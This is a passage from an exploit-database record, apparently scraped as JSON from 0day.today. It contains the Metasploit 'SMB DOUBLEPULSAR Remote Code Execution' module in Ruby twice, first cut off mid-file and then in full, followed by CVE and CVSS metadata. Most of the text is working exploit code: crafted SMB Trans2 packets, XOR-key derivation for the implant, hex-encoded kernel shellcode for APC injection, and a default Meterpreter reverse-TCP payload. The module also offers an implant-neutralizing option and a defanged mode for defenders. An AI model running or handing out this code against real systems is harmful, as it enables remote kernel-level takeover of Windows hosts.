pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-10] #"}, "lastseen": "2021-09-09T22:14:51", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "89b150871bc89d1eed6b6e98db6caf24", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T22:13:26", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-10T22:13:26", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-10T22:13:26", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n 